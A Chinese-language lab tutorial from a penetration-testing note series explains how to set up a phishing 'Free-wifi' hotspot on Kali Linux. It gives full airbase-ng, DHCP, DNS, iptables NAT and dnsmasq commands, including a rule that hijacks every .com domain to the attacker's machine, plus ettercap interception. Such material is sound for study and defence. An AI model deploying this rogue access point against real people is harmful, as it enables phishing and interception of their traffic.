無線攻防之Kali自搭建釣魚Wifi
簡介
滲透測試-地基篇
該篇章目的是重新牢固地基,加強(qiáng)每日訓(xùn)練操作的筆記,在記錄地基筆記中會(huì)有很多跳躍性思維的操作和方式方法,望大家能共同加油學(xué)到東西。
請注意:
本文僅用于技術(shù)討論與研究,對于所有筆記中復(fù)現(xiàn)的這些終端或者服務(wù)器,都是自行搭建的環(huán)境進(jìn)行滲透的。我將使用Kali Linux作為此次學(xué)習(xí)的攻擊者機(jī)器。這里使用的技術(shù)僅用于學(xué)習(xí)教育目的,如果列出的技術(shù)用于其他任何目標(biāo),本站及作者概不負(fù)責(zé)。
名言:
你對這行的興趣,決定你在這行的成就!
一、前言
今天會(huì)講解到無線攻防自搭建釣魚Wifi中的:安裝部署環(huán)境、無線網(wǎng)卡外接開啟、開啟釣魚wifi-Free、添加和配置本地接口并配置、DHCP服務(wù)搭建、wireshark抓包檢查+本地驗(yàn)證、搭建DNS服務(wù)、配置防火墻規(guī)則放行等等操作,如果連無線攻防都不會(huì)安裝甚至滲透操作等,怎么拿下對方服務(wù)器?
二、自搭建釣魚Wifi(方法一)
這里介紹無線攻防實(shí)戰(zhàn)的另外一種新姿勢,就是自己搭建釣魚wifi針對用戶進(jìn)行的攻擊,沒有哪一個(gè)系統(tǒng)能扛得住社會(huì)工程學(xué)技術(shù)的入侵,主要用kali來搭建模擬環(huán)境,如果別的環(huán)境需要搭建原理方法一致。

1、安裝部署環(huán)境
1)更新源+安裝釣魚部署環(huán)境包
apt-get update
apt install bind9
apt-get install isc-dhcp-server



成功完成安裝!
2、無線網(wǎng)卡外接開啟
這里需要連接兩個(gè)外接無線網(wǎng)卡,除非自身本地是kali系統(tǒng),外接一個(gè)無線網(wǎng)卡即可!插上兩張無線網(wǎng)卡后會(huì)顯示wlan0和wlan1...
1)首先開啟無線網(wǎng)卡:
airmon-ng start wlan0
iwconfig


這里wlan0激活后未wlan0mon監(jiān)聽模式:Monitor
wlan1為接收模式:Managed
2)設(shè)置靜態(tài)wlan0地址
vi /etc/network/interfaces
auto wlan1
iface wlan1 inet static
address 192.168.150.222
netmask 255.255.255.0
gateway 192.168.150.1

給wlan1配置完成靜態(tài)IP地址,需要重啟網(wǎng)卡!
3)開啟靜態(tài)接口地址
service networking restart

成功啟動(dòng)靜態(tài)wlan1網(wǎng)卡!
3、開啟釣魚wifi-Free
開啟免費(fèi)信號,使用wlan0mon開啟免費(fèi)wifi進(jìn)行釣魚:
airbase-ng -e "Free-wifi" -c 6 wlan0mon

成功利用wlan0mon開啟釣魚wifi名稱為:Free-wifi,外置的wifi信號可以發(fā)現(xiàn)我們剛開啟的!
4、添加和配置本地接口并配置
現(xiàn)在只是釣魚信號發(fā)送出來了,需要一個(gè)靜態(tài)的地址給到內(nèi)置的相應(yīng)模塊上面。
1)開啟本地接口at0
ifconfig at0 up
ifconfig at0

2)內(nèi)置無線模塊的接口配置IP:at0
vi /etc/network/interfaces
auto at0
iface at0 inet static
address 192.168.1.1
netmask 255.255.255.0

保存即可,網(wǎng)關(guān)地址配置完成!
3)刷新網(wǎng)絡(luò)服務(wù)
service networking restart

成功分配地址給at0網(wǎng)卡!
5、DHCP服務(wù)搭建
目前釣魚wifi這邊已經(jīng)有了網(wǎng)關(guān)地址,但是客戶端還無法獲得相關(guān)的dhcp類似的地址,需要搭建服務(wù)!環(huán)境bing9和dhcp已經(jīng)在前面環(huán)境安裝部署好了...開始!
1)配置釣魚wifi子網(wǎng)信息
配置dhcpd.conf文件
cd /etc/dhcp

可以看到存在dhcpd.conf,接下來就配置該文件即可!
vi dhcpd.conf
subnet 192.168.1.0 netmask 255.255.255.0 {
?range 192.168.1.100 192.168.1.150;
?option routers 192.168.1.1;
?option subnet-mask 255.255.255.0;
?option domain-name-servers 192.168.150.222;
}

目前完成了子網(wǎng)的配置,192.168.10.10會(huì)用來搭建DNS緩存服務(wù)器!
2)開啟服務(wù)監(jiān)聽at0
vi /etc/default/isc-dhcp-server

service isc-dhcp-server start

成功開啟!
3)如果遇到錯(cuò)誤如何排查??!

報(bào)錯(cuò)了,分析下錯(cuò)誤!
journalctl -xe

查看保存記錄,配置文件配置錯(cuò)誤!

重新配置下該處即可!

成功開啟!
4)或者查看端口是否開啟:
netstat -ntulp |grep 67

DHCP開啟的是67端口...
6、wireshark抓包檢查+本地驗(yàn)證
開啟wireshark監(jiān)聽eth1接口:
可看到握手包流量也已經(jīng)有了!
手機(jī)鏈接wifi后也可以看到IP、網(wǎng)關(guān)、DNS都是對的!
7、kali-搭建DNS服務(wù)
https://www.jianshu.com/p/bf3f7011b9fe
目前DNS已經(jīng)指向我們,我們目前沒有DNS服務(wù),需要搭建,首先一定要安裝好bind9環(huán)境,然后進(jìn)入目錄查看下底層詳細(xì)信息。
1)了解底層文件
cd /etc/bind
查看主配置文件:
可看到全局文件都將各個(gè)配置文件分散開進(jìn)行配置的!
2)配置DNS全局配置文件
vi named.conf.options
需要配置參數(shù):
vi named.conf.options
forwarders { 8.8.8.8; };
recursion yes;
allow-query { any; };
listen-on { any; };
listen-on port 53 { 192.168.10.10; };
注意空格!這里圖片有個(gè)錯(cuò)誤的,就是{}括號問題!修改即可!
代理到google的DNS服務(wù)器,
允許轉(zhuǎn)發(fā)的范圍any
監(jiān)聽范圍any
監(jiān)聽的端口 53
3)重啟服務(wù)bind9
service named restart
service named status
4)nslookup檢測
apt-get install dnsutils
如果無nslookup手動(dòng)安裝即可!
可看到server為:192.168.253.1,為本機(jī)默認(rèn)的DNS的IP,需要更高下即可!
5)更高本機(jī)DNS
vi /etc/resolv.conf
將192.168.253.1更改為192.168.10.10即可!
6)重啟網(wǎng)絡(luò)服務(wù)
service networking restart
重啟后開啟防火墻規(guī)則!
7)開啟防火墻規(guī)則
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o wlan1 -j SNAT --to-source 192.168.10.10
到此wifi就能順利連接進(jìn)入進(jìn)行監(jiān)視釣魚!
三、Kali自搭建釣魚(方法二)
1、安裝部署環(huán)境
更新源+安裝釣魚部署環(huán)境包
apt-get update
apt install dnsmasq
apt-get install isc-dhcp-server
2、無線網(wǎng)卡外接開啟
1)連接無線網(wǎng)卡


可看到wlan0已經(jīng)成功接入kali
2)開啟wlan0無線網(wǎng)卡
airmon-ng start wlan0

成功開啟wlan0無線網(wǎng)卡,名稱為:wlan0mon
3、添加虛擬網(wǎng)段網(wǎng)卡
vi /etc/network/interfaces
auto at0
iface at0 inet static
address 192.168.1.1
netmask 255.255.255.0
service networking restart

重新網(wǎng)卡后報(bào)錯(cuò)先不管!
4、開啟釣魚wifi
airbase-ng -e Free-wifi -c 11 wlan0mon

先創(chuàng)建個(gè)wifi此時(shí)wifi是無法連接上去的,因?yàn)镈HCP和at0未配置!
5、配置DHCP和虛擬網(wǎng)卡
1)開啟at0網(wǎng)卡,并重啟服務(wù)
ifconfig at0 up
service networking restart

2)配置DHCP
vi /etc/dhcp/dhcpd.conf
subnet 192.168.1.0 netmask 255.255.255.0{
range 192.168.1.101 192.168.1.150;
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 192.168.253.150;
}

6、配置虛擬網(wǎng)卡信息
1)開啟網(wǎng)段等配置信息
ifconfig at0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
service networking restart

查看開啟狀態(tài):
service networking status

成功開啟!
2)開啟服務(wù)監(jiān)聽at0
vi /etc/default/isc-dhcp-server

service isc-dhcp-server start

成功開啟!

7、配置防火墻規(guī)則放行
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j SNAT --to 192.168.253.150

再次檢測,此時(shí)釣魚wifi已經(jīng)可以上網(wǎng)了!
8、DNS劫持
1)配置DNS劫持
vi /etc/dnsmasq.conf
resolv-file=/etc/resolv.conf
strict-order
listen-address=192.168.253.150
address=/.com/192.168.253.150
server=8.8.8.8
server=114.114.114.114

劫持所有.com的域名!
2)將eth0配置為dns
auto eth0
iface eth0 inet static
address 192.168.253.150
netmask 255.255.255.0
gateway 192.168.253.1

3)啟用DNSmasq
Dnsmasq 提供 DNS 緩存和 DHCP 服務(wù)功能。作為域名解析服務(wù)器(DNS),dnsmasq可以通過緩存 DNS 請求來提高對訪問過的網(wǎng)址的連接速度。作為DHCP 服務(wù)器,dnsmasq 可以用于為局域網(wǎng)電腦分配內(nèi)網(wǎng)ip地址和提供路由。DNS和DHCP兩個(gè)功能可以同時(shí)或分別單獨(dú)實(shí)現(xiàn)。dnsmasq輕量且易配置,適用于個(gè)人用戶或少于50臺主機(jī)的網(wǎng)絡(luò)。此外它還自帶了一個(gè) PXE 服務(wù)器。
service dnsmasq start
ettercap -Tq -i at0
dnsmasq輕量且易配置,適用于個(gè)人用戶或少于50臺主機(jī)的網(wǎng)絡(luò),按照命令開啟即可!
四、總結(jié)
今天學(xué)到無線攻防自搭建釣魚Wifi中的:安裝部署環(huán)境、無線網(wǎng)卡外接開啟、開啟釣魚wifi-Free、添加和配置本地接口并配置、DHCP服務(wù)搭建、wireshark抓包檢查+本地驗(yàn)證、搭建DNS服務(wù)、配置防火墻規(guī)則放行等等操作,學(xué)到了非常多的小技巧和干貨,希望小伙伴能實(shí)際操作復(fù)現(xiàn)一遍!來鞏固告知企業(yè)單位的漏洞情況,并盡快進(jìn)行加固鞏固安全!
服務(wù)攻防之?dāng)?shù)據(jù)庫Mysql(上)->
服務(wù)攻防之?dāng)?shù)據(jù)庫Mysql(下)-> 服務(wù)攻防之?dāng)?shù)據(jù)庫MSSQL(上)-> 服務(wù)攻防之?dāng)?shù)據(jù)庫MSSQL(中)->
服務(wù)攻防之?dāng)?shù)據(jù)庫MSSQL(下)-> 服務(wù)攻防之?dāng)?shù)據(jù)庫Oracle(上)-> 服務(wù)攻防之?dāng)?shù)據(jù)庫Oracle(下)->
服務(wù)攻防之?dāng)?shù)據(jù)庫Redis(上)-> 服務(wù)攻防之?dāng)?shù)據(jù)庫Redis(下)-> 服務(wù)攻防之?dāng)?shù)據(jù)庫Mongodb(上)->
服務(wù)攻防之?dāng)?shù)據(jù)庫Mongodb(下)-> 服務(wù)攻防之中間件IIS(上)-> 服務(wù)攻防之中間件IIS(下)->
服務(wù)攻防之中間件Apache(總)-> 服務(wù)攻防之中間件Nginx(總)-> 服務(wù)攻防之中間件Tomcat(上)->
服務(wù)攻防之中間件Tomcat(下)-> 服務(wù)攻防之中間件JBoss(上)-> 服務(wù)攻防之中間件JBoss(中)->
服務(wù)攻防之中間件JBoss(下)-> 服務(wù)攻防之中間件Weblogic(上)-> 服務(wù)攻防之中間件Weblogic(下)->
服務(wù)攻防之中間件GlassFish(總)-> 服務(wù)攻防之中間件WebSphere(總)->
服務(wù)攻防之框架Struts2(上)-> 服務(wù)攻防之框架Struts2(下)-> 服務(wù)攻防之框架Thinkphp(總)->
服務(wù)攻防之框架Shiro(總)-> 服務(wù)攻防之框架Spring(上)-> 服務(wù)攻防之框架Spring(下)->
服務(wù)攻防之框架FastJson(上)-> 服務(wù)攻防之框架FastJson(下)-> 無線攻防之Wifi破解(上)->
無線攻防之Wifi破解(下)-> 無線攻防之Kali自搭建釣魚Wifi(總)......

希望大家提高安全意識,沒有網(wǎng)絡(luò)安全就沒有國家安全!
今天基礎(chǔ)牢固就到這里,雖然基礎(chǔ),但是必須牢記于心。